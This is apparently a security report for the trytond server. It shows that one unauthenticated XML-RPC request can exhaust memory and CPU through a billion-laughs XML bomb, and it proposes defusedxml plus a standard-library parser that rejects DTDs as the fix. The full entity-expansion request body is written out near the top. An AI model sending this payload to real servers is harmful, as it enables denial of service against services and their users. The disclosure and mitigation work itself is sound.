A non-authenticated user can cause a denial of service with a single request, using an XML bomb attack on xmlrpc
Tested against trytond 6.2 with Python 3.8.10
A non-authenticated user can saturate the trytond server's memory and CPU with a single xmlrpc request, using the billion laughs attack or a similar "XML bomb" attack.
Request example [do not test it against a production server, of course :)]:
url : http://example.trytond.com/ method: POST
headers: Content-Type: text/xml
body:
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>
When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy. When testing the request on my machine, the 16GB of RAM and 1 GB swap were full in under a minute.
defusedxml has a monkey patch for this.
If we use this monkey patch by adding the following to trytond/protocols/xmlrpc.py:
from defusedxml.xmlrpc import monkey_patch
monkey_patch()
then the server will respond to the same request with :
"400 Bad Request: Unable to read XMl request". (because the monkey patch forbids it)
So it does look like a simple protection against this attack and similar "XML bomb" attacks.
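As an added example (not code from the original report, from trytond, or from defusedxml), the protection the monkey patch provides can be reproduced with the standard library alone: a subclass of xmlrpc.client.ExpatParser registers expat handlers for the DOCTYPE and entity declarations that raise, so a body carrying a DTD is refused before expat expands a single entity reference. That is the same mechanism defusedxml installs when monkey_patch() swaps in its own parser class. The class and function names, the exception type and both sample request bodies are constructed for this example; the second body declares one harmless entity, enough to trigger the check without any amplification. The subclass relies on the private _parser attribute of CPython's ExpatParser.

```python
import xmlrpc.client
from xml.parsers import expat


class XmlRpcDtdRejected(ValueError):
    """Raised when an XML-RPC body carries a DOCTYPE or an entity declaration."""


class EntityRejectingExpatParser(xmlrpc.client.ExpatParser):
    """xmlrpc.client.ExpatParser that aborts on any DTD content.

    XML-RPC never needs a DOCTYPE, and every entity declaration (the building
    block of an XML bomb) lives inside the DTD, so refusing the DTD outright
    is the simplest safe policy. Hypothetical class for this example; it uses
    the private ``_parser`` attribute of CPython's ExpatParser.
    """

    def __init__(self, target):
        super().__init__(target)
        # expat invokes these as soon as it sees the declaration, i.e. before
        # any entity reference in the document body is expanded.
        self._parser.StartDoctypeDeclHandler = self._reject_doctype
        self._parser.EntityDeclHandler = self._reject_entity

    @staticmethod
    def _reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise XmlRpcDtdRejected("DOCTYPE declaration is not allowed in XML-RPC requests")

    @staticmethod
    def _reject_entity(entity_name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        raise XmlRpcDtdRejected("entity declaration %r is not allowed" % entity_name)


def safe_loads(body):
    """Parse an XML-RPC request body and return (params, methodname).

    Mirrors xmlrpc.client.loads but feeds the DTD-rejecting parser instead.
    """
    target = xmlrpc.client.Unmarshaller()
    parser = EntityRejectingExpatParser(target)
    parser.feed(body)
    parser.close()
    return target.close(), target.getmethodname()


def classify_request(body):
    """Return ("accepted", methodname) or ("rejected", reason) for a request body.

    A server front end would turn "rejected" into a 400 response without
    ever touching the RPC dispatcher.
    """
    try:
        _params, method = safe_loads(body)
    except XmlRpcDtdRejected as exc:
        return ("rejected", str(exc))
    except expat.ExpatError as exc:
        return ("rejected", "malformed XML: %s" % exc)
    return ("accepted", method)


# Constructed sample bodies (not taken from the report).
BENIGN_REQUEST = (
    b"<?xml version='1.0'?>"
    b"<methodCall><methodName>example.ping</methodName>"
    b"<params></params></methodCall>"
)

# One harmless internal entity: enough to exercise the DTD check, with no
# amplification whatsoever.
DTD_REQUEST = (
    b"<?xml version='1.0'?>"
    b'<!DOCTYPE methodCall [<!ENTITY e "x">]>'
    b"<methodCall><methodName>&e;</methodName><params></params></methodCall>"
)


if __name__ == "__main__":
    print(classify_request(BENIGN_REQUEST))
    print(classify_request(DTD_REQUEST))
```

Because xmlrpc.client.getparser() looks up ExpatParser by name at call time, assigning a class like this one to xmlrpc.client.ExpatParser makes every subsequent xmlrpc.client.loads() call use it, which is exactly how the defusedxml monkey patch quoted above takes effect process-wide.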